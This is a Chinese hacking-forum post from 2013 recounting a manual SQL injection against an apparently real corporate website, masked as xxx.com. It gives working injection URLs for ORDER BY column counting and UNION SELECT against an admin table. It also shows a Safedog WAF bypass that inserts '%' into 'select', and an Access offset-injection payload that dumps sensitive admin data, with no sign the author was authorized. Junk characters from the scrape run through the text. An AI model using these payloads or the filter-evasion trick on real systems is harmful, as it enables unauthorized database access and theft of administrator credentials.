找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1912|回复: 0
打印 上一主题 下一主题

一次手工渗透突破安全狗防御+ACCESS偏移注入

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-8 21:49:45 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
打开网站,一个企业站。
0 Z: x" d5 w) W3 J: _7 w6 l* ]1 M/ {) V  C
% z# p, U' d; a0 t# J
顺手加个admin
0 H2 a; v% t& s, }* T. q1 U6 l: K- T# k
3 n, z5 s9 n5 c8 O4 [
默认后台。4 b, }: t9 C, H3 \  j8 W
回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。​2 i' N7 _2 ~  S; T6 n) h

$ e- s& [  m7 M6 m" o
1 Z1 _: d0 O, ^! Q2 a! V  z! H4 i$ T* b; I" [; H* Q' W" k  f
所以就不用御剑扫了,待会直接封IP。6 ^' s  S) m- A

' V# n3 D) I( D6 e0 ?# U1 T用order by语句判断是否存在注入。- N3 A& G& r& Y! t0 X' z# }
http://www.xxx.com /product_show.asp?id=997 order by 1. \( t# ^* _. e7 @) Y3 x0 E- H
http://www.xxx.com /product_show.asp?id=997 order by 100
* O1 N! E' T7 R0 i4 h# `9 Y现在存在注入,经测试后发现是9个字段。# C$ _: P, t1 `& ]+ x1 n; _
7 q0 f$ ^7 o. A7 @' Y& p
接下来进行联合查询,猜是否存在admin表。
/ N1 z2 B% ^  [3 w; W% C) H6 bhttp://www.xxx.com /product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。​4 w9 h4 h2 o2 ]; c5 h( H! c
% {& w6 ^6 P3 I* `. I+ X
* p' Z. c' w1 M. x% X8 P

5 {6 b" q! o) T7 N  N4 s) |% i在select中间加个%,se%lect绕过安全狗。
9 m& ^' z4 U+ o* l! W9 V  g9 O* R. c* D8 z

- u& H, h& R8 a0 }; X4 F" Y4 [发现存在admin表,然后开始手工猜常用的字段。
: c0 ^) X3 I) m6 ~: x纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。
6 j2 h; C, r$ K  ~
3 y& A5 {! A6 p, z8 c* N4 B突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。
+ n6 u. m) A% `
2 s) c$ i6 a9 y6 U  @% m9 |科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。; K1 V6 Q/ Q1 o6 d$ u$ R: s. T
http://www.xxx.com /product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin- e/ m! `0 t. {
好了,敏感内容出显了。​
! e8 A2 k* E5 }
% J! }6 _6 [% Y" z3 |
$ C; T8 j' X) u' r& }1 V& ^& `4 t  h
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表